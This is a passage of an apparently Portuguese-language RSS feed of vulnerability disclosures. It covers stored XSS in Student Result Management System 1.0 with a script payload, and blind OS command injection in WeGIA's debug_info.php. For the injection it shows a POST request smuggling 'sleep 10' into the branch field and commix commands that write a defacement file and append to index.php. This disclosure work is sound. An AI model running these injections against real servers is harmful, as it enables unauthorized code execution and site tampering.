&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image.png&amp;#34;
	width=&amp;#34;1883&amp;#34;
	height=&amp;#34;989&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image_hu_71491be5bdea0f0e.png 480w, /p/cve-2025-6475/image_hu_92cd8e49ca5dfcb1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image-1.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;986&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image-1_hu_cf4dd5bb1ea8a37b.png 480w, /p/cve-2025-6475/image-1_hu_fbd362652743b24f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;464px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6475/image-2.png&amp;#34;
	width=&amp;#34;1905&amp;#34;
	height=&amp;#34;987&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6475/image-2_hu_3e8433f59e31d0f4.png 480w, /p/cve-2025-6475/image-2_hu_ad04074a8049b310.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/rBtUzvmoIxc&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/rBtUzvmoIxc&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6475.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 22 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6477</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6477/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6477/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6477-cross-site-scripting-xss-armazenado-no-endpoint-system-parâmetro-school-name&amp;#34;&amp;gt;CVE-2025-6477: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6477-cross-site-scripting-xss-armazenado-no-endpoint-system-parâmetro-school-name&amp;#34;&amp;gt;CVE-2025-6477: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6477&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;system&amp;lt;/code&amp;gt; do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/srms/script/admin/students&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;School Name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB SRMS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image_hu_7cde227e4d03ee28.png 480w, /p/cve-2025-6477/image_hu_a896ba7965cb155.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image-1.png&amp;#34;
	width=&amp;#34;1909&amp;#34;
	height=&amp;#34;989&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image-1_hu_f09a3ad56b404d14.png 480w, /p/cve-2025-6477/image-1_hu_e0f5609d6ecb5124.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6477/image-2.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;1005&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6477/image-2_hu_117d198a06d18269.png 480w, /p/cve-2025-6477/image-2_hu_7046a41012ca59a3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/FhPQLGorbqA&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/FhPQLGorbqA&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6477.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 22 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-50201</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-50201/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-50201/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-50201-injeção-de-comando-no-sistema-operacional-cega-baseada-em-tempo-em-debug_infophp-parâmetro-branch&amp;#34;&amp;gt;CVE-2025-50201: Injeção de Comando no Sistema Operacional (Cega Baseada em Tempo) em &amp;lt;code&amp;gt;debug_info.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção de comando no sistema operacional foi identificada no endpoint &amp;lt;code&amp;gt;/html/configuracao/debug_info.php&amp;lt;/code&amp;gt;. O parâmetro &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt; não é devidamente sanitizado antes de ser concatenado e executado em um comando shell no sistema operacional do servidor.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Essa falha permite que um invasor não autenticado execute comandos arbitrários no servidor com os privilégios do usuário do servidor web &amp;lt;code&amp;gt;(www-data)&amp;lt;/code&amp;gt;. Isso compromete completamente a confidencialidade, a integridade e a disponibilidade do aplicativo e do servidor subjacente.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-50201-injeção-de-comando-no-sistema-operacional-cega-baseada-em-tempo-em-debug_infophp-parâmetro-branch&amp;#34;&amp;gt;CVE-2025-50201: Injeção de Comando no Sistema Operacional (Cega Baseada em Tempo) em &amp;lt;code&amp;gt;debug_info.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-50201&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção de comando no sistema operacional foi identificada no endpoint &amp;lt;code&amp;gt;/html/configuracao/debug_info.php&amp;lt;/code&amp;gt;. O parâmetro &amp;lt;code&amp;gt;branch&amp;lt;/code&amp;gt; não é devidamente sanitizado antes de ser concatenado e executado em um comando shell no sistema operacional do servidor.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Essa falha permite que um invasor não autenticado execute comandos arbitrários no servidor com os privilégios do usuário do servidor web &amp;lt;code&amp;gt;(www-data)&amp;lt;/code&amp;gt;. Isso compromete completamente a confidencialidade, a integridade e a disponibilidade do aplicativo e do servidor subjacente.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade pode ser acionada enviando uma solicitação POST ao endpoint vulnerável e injetando metacaracteres de shell (como ;) no parâmetro branch. O servidor executa a entrada fornecida sem validação. A vulnerabilidade foi confirmada como &amp;#34;Cega&amp;#34;, pois a saída do comando não é refletida diretamente na resposta HTTP, exigindo, portanto, técnicas de exploração baseadas em tempo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Solicitação Vulnerável Inicial:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /html/configuracao/debug_info.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: demo.wegia.org
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 39
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;branch=master; sleep 10&amp;amp;amp;action=switch
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A resposta tardia do servidor confirmou a vulnerabilidade.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Para demonstrar um impacto tangível na integridade do sistema, a ferramenta commix foi usada para injetar um comando echo que cria um novo arquivo HTML em um diretório acessível pela web no servidor.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;1-comando-de-ataque&amp;#34;&amp;gt;1. Comando de Ataque:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The following command was executed to create the prova_tcc.html file on the server with custom content:&amp;lt;/p&amp;gt;
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;python3 commix.py -u &amp;#34;https://demo.wegia.org/html/configuracao/debug_info.php&amp;#34; \--data=&amp;#34;branch=master&amp;amp;amp;action=switch&amp;#34; -p &amp;#34;branch&amp;#34; -technique=&amp;#34;time&amp;#34; \--os-cmd=&amp;#39;echo &amp;#34;&amp;amp;lt;h1&amp;amp;gt;Server Hacked - Server Access Confirmed&amp;amp;lt;/h1&amp;amp;gt;&amp;#34; &amp;amp;gt; prova_tcc.html&amp;#39;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;718&amp;#34;
	srcset=&amp;#34;/p/cve-2025-50201/image_hu_3421cbc964fa3b64.png 480w, /p/cve-2025-50201/image_hu_3510a028ee9d8955.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;267&amp;#34;
		data-flex-basis=&amp;#34;641px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;python3 commix.py -u &amp;#34;https://demo.wegia.org/html/configuracao/debug_info.php&amp;#34; --data=&amp;#34;branch=master&amp;amp;action=switch&amp;#34; -p &amp;#34;branch&amp;#34; --technique=&amp;#34;time&amp;#34; --time-sec=2 --os-cmd=&amp;#39;echo &amp;#34;teste&amp;#34; &amp;gt;&amp;gt; ../../index.php&amp;#39;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-50201/image-1.png&amp;#34;
	width=&amp;#34;1919&amp;#34;
	height=&amp;#34;701&amp;#34;
